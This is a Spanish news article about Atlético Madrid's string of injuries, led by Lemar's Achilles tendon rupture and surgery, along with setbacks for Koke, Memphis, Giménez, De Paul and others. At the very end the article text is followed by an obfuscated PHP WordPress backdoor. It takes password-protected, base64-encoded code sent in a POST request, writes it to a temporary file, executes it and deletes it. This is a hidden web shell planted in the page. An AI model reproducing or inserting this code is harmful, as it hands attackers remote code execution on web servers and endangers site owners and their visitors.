Atletico Madrid: Lemar, adiós hasta 2024

Pasará por quirófano y podría perderse lo que queda de temporada. Con la lesión del francés, ya son siete bajas las que sufre el Atlético en apenas cinco jornadas de Liga.

El Atlético de Madrid se enfrenta a una de sus temporadas más duras en cuanto a lesiones se refiere. Lemar, que ya se perdió el partido ante el Rayo, ha vuelto a caer en Mestalla con una grave lesión. Según ha confirmado el Atlético, el francés sufre una rotura del tendón de Aquiles derecho y será intervenido quirúrgicamente.

El mediocentro francés, que siempre ha tenido la confianza del Cholo, ha sufrido infinitas lesiones en los cinco años que lleva en el Metropolitano. Todas ellas le han obligado a perderse más de 50 partidos además de sumar un tiempo total de baja de 260 días. Una situación verdaderamente preocupante.

La cuestión no solo se centra en Lemar sino en todos los jugadores que han pasado por la enfermería rojiblanca (concretamente siete) en apenas un mes de competiciónEl capitán Koke duró únicamente siete minutos sobre el césped del Metropolitano hasta que sus isquios dijeron basta. Dos jornadas después, en Vallecas, Memphis se lesionó en el muslo pasada la media hora de juego. El neerlandés había tenido un gran inicio de Liga con dos goles en los tres primeros duelos.

Nahuel Molina y Giménez cayeron en pretemporada. No participaron en la gira y no pudieron comenzar LaLiga. Es más, el uruguayo debutó en Mestalla. Reinildo, por su parte, continúa pacientemente con su recuperación desde que se lesionara el pasado mes de febrero en el derbi madrileño. No hay plazos estimados para su vuelta al grupo, pero es otro de los contratiempos con los que ha tenido que lidiar el club desde la segunda mitad de la anterior temporada.

El virus FIFA tampoco ayuda

Söyüncü De Paul han regresado de sus compromisos internacionales con minutos y lesiones en sus piernas. El turco, que había acumulado tiempo de juego y buenas sensaciones regresando a la titularidad, aterrizó con molestias y no se presentó en el duelo en Valencia. Misma situación con De Paul que, además de haber regresado de su estancia con la albiceleste a altas horas de la madrugada, también lo hizo con dolencias musculares que lo apartaron también de la convocatoria.

Samuel Lino, que entró en la lista para el choque contra el conjunto de Baraja, ha arrastrado molestias durante la última semana, que le han hecho ausentarse de dos entrenos con el grupo y que han provocado que tampoco dispute ni un solo minuto en el césped de Mestalla. Muchas lesiones y pocas soluciones.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}